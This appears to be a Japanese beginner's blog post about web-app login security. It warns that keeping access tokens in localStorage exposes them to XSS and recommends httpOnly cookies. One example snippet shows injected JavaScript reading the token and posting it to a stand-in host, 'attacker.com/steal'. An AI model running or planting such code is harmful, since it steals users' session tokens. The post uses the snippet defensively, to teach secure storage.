đ ïž ăŸăăŻćăăïŒă§ăăăźăăšă«èăăăčăăă»ăă„ăȘăăŁăăźè©±
æçšżæ„: 2025ćčŽ05æ26æ„
WebăąăăȘăéçșăăŠăăăšăăŸăăăă°ă€ăłæ©èœăă€ăăăăăšæăăŸăăăă
æćăŻăšă«ăăăćăăăšăă性äșă§ăăćăăăă§ăăă
ăă°ă€ăłăăăăăă·ă„ăăŒăă«é·ç§»ăă
ăăäžćșŠéăăăăă°ă€ăłç¶æ ăæźăŁăŠăă
ăăă°ă€ăłç¶æ ăäżæăăăă«ăă§ăăŻăă€ăăăèšæ¶ăăă
ăŸăăŻăăăŸă§ă§ăăă°ăăăăćăăăïŒăăšăăłă·ă§ăłăäžăăăŸăă
ă§ăăăăă ăă§ç”ăăŁăŠăŻăăăŸăăă
ä»ćăŻăăăŒăŻăłăźäżćć Žæăă«ă€ăăŠăă»ăă„ăȘăăŁăźèŠłçčăăăăšă§ăĄăăăšèăăăăšăă話ă§ăă
ăŸăæè»œă«ćăăæčæłăšăăŠăăäœżăăăăźăăăă§ăïŒ
localStorage.setItem("accessToken", token);
ăă°ă€ăłćŸă«ăăŒăŻăłăććŸă㊠localStorage
ă«äżćăăæŹĄćăąăŻă»ăčæă« localStorage.getItem()
ă§èȘăżćșăă°ăăăă°ă€ăłç¶æ
ăäżæăăŠăăăăă«èŠăăă ăšăăćźèŁ
ă«ăȘăăŸăă
ăăăăšăŠăæè»œă§ćăăŸăă
localStorage ă sessionStorage ăŻăJavaScript ăăç°Ąćă«èȘăżæžăă§ăăŸăă
ăšăăăăšăŻă**æȘæăźăăăčăŻăȘăăïŒXSSæ»æïŒ**ăć
„ă蟌ăă ăšăă仄äžăźăăăȘăăšăćŻèœă«ăȘăăŸăă
const stolenToken = localStorage.getItem("accessToken");
fetch("https://attacker.com/steal", {
method: "POST",
body: JSON.stringify({ token: stolenToken }),
});
ăăăŻæŹćœă«ć±éșă§ăă
httpOnly
ăă©ă°ăă€ăă Cookie ă«ăăŒăŻăłăäżćăăăšăJavaScript ăăăąăŻă»ăčă§ăăŸăăă
ă€ăŸăăXSSæ»æăźèą«ćźłă性ăăæžăăăăšăă§ăăŸăă
res.cookies.set("access-token", token, {
httpOnly: true,
secure: true,
sameSite: "lax",
path: "/",
maxAge: 60 * 60 * 24 * 30, // 30æ„
});
ăăźăăă«èšćźăăă°ăăăŒăŻăłăŻ ă”ăŒăăŒă«èȘćă§é俥ăăăăŻă©ă€ăąăłăćŽă§ăŻè§ŠăăȘăç¶æ ă«ăȘăăŸăă
ććżè ăé„ăăăĄăȘèœăšă穎ăŻăăćăăăăOKïŒăă§ç”ăăăăšă§ăă
ă§ăăWebăąăăȘăć°ăăă€äœżăăăăă«ăȘăŁăŠăăăšă
ăæȘæăăăąăŻă»ăčăăăăȘăăăŸăăăăćźăćż
èŠăćșăŠăăŸăă
ă ăăăăă
ăŸă㯠localStorage ăȘă©ăäœżăŁăŠăćăăă°ă€ăłæ©èœăăäœă
æŹĄă«ă»ăă„ăȘăăŁă«ă€ăăŠèȘżăčăŠăCookieăăŒăčă«ç§»èĄăă
ăšăăæ”ăă§éçșăăŠăăăźăăèȘç¶ă§ăăăăŠæŁăăé ćșă ăšæăăŠăăŸăă
đ ăăŸăïŒèŠăăŠăăăčăăă€ăłăăŸăšă
ă»ăă„ăȘăăŁăćźç§ă«çè§ŁăăŠăăćźèŁ
ăăćż
èŠăŻăăăŸăăă
æćăŻăăă°ă€ăłă§ăăïŒç¶æ
ăäżæă§ăăïŒăăšăăăšăăă§æșè¶łăăŠăăŸăăăă§ăćźéă«èȘćă§ăȘăȘăžăă«ăąăăȘăäœăéČăăŠăăäžă§ă**ăăăä»äșșăźăă©ăŠă¶ă§èȘćăă°ă€ăłăăăăïŒăăæȘæăăăłăŒăăć
„ă蟌ăă ăïŒă**ăšăăȘăąă«ăȘ㱿©æăèœçăăŠăăŸăăă
èȘćăźăąăăȘă«ăŠăŒă¶ăŒăćąăăăăæ©èœăćąăăŠăăăšăăæŁăăćăăăšăă ăă§ăŻè¶łăăȘăăšæ°ă„ăăŸăă
ćăăăźăă§ăăăăăăăæŹĄă«ăă©ăćźăăăăçćŁă«èăăăăăăă«ăȘăŁăââăăăŻăȘăȘăžăă«ăąăăȘăäœăŁăŠăżăăăăăăźæ°ă„ăă§ăăă
TypeScriptăźććźć šăæźșă!? ćäșșçăąăłăăăżăŒăłđ„
ććżè ćăïŒ3ă€ăźăăżăŒăłăźăłăŒăæŻèŒă§çè§ŁăăNext.jsăźăłăłăăŒăăłăććČ
NestJSăźăăłăŹăŒăżăŒăšăŻïŒ@Controlleră@Injectableăźæćłăšäœżăæčăććżè ćă
NestJSććżè ćăïŒAppModule / Controller / ServiceăźćșæŹæ§æăšćäœăźæ”ă
Nest.jsăźćșæŹæ§æăŹă€ă
ăłăă„ăăăŁă愜ăăăăăźăčăăă